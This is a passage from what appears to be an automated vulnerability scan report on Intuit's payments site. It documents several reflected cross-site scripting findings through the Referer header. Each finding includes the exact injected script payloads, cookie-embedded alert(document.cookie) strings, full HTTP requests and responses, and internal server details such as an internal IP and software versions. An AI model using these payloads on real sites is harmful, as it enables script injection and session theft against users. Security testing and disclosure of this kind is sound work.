Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9616C710A0805192AA117E3B96D5DA6
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151809

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=2f767'-alert(1)-'9675c472618';
                   </script>
...[SNIP]...

1.26. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload de4d4--><script>alert(1)</script>82fdb4532f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=de4d4--><script>alert(1)</script>82fdb4532f7

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=PyZhGH72PBrAq3Hf4qd1tg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:10 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96180120A0805192AA117E3C5484290
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151842

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=de4d4--><script>alert(1)</script>82fdb4532f7 | -->
...[SNIP]...

1.27. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9f96'-alert(1)-'b074d756760 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=e9f96'-alert(1)-'b074d756760

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:57 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=rnCR0HgxGDD5+iZ-tWA2Mw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:58 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9606A630A0805192AA117E378B5BFD1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110754

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=e9f96'-alert(1)-'b074d756760';
                   </script>
...[SNIP]...

1.28. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 89bfc--><script>alert(1)</script>439a0271950 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=89bfc--><script>alert(1)</script>439a0271950

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:13 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=0xNoB2tLCGWrVWeGSlYOGg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:14 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960A7C00A0805192AA117E36C190326
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110789

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=89bfc--><script>alert(1)</script>439a0271950 | -->
...[SNIP]...

1.29. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13123'-alert(1)-'be5801a90fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=13123'-alert(1)-'be5801a90fa

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:23 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=v+hf0L3PiOVSnTMZkzeHEw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:24 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C3C7A0A0805192AA117E30A9ED903
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96465

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=13123'-alert(1)-'be5801a90fa';
                   </script>
...[SNIP]...

1.30. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d754d--><script>alert(1)</script>cf0ed983ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=d754d--><script>alert(1)</script>cf0ed983ea

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=wIeJmrvn-NaS8PtECoD4IQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C7A2C0A0805192AA117E362280873
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96494

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=d754d--><script>alert(1)</script>cf0ed983ea | -->
...[SNIP]...

1.31. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac0d6'-alert(1)-'c1f71db423d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ac0d6'-alert(1)-'c1f71db423d

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=pD4WYGG-Cvv7karQOMmXBA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FDB4B0A0805192AA117E345F87602
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109428

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=ac0d6'-alert(1)-'c1f71db423d';
                   </script>
...[SNIP]...

1.32. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3c927--><script>alert(1)</script>c31793869de was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=3c927--><script>alert(1)</script>c31793869de

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=+O5vTWSpUYzZ0cAiwOULPg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96023F60A0805192AA117E3C0B449FB
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
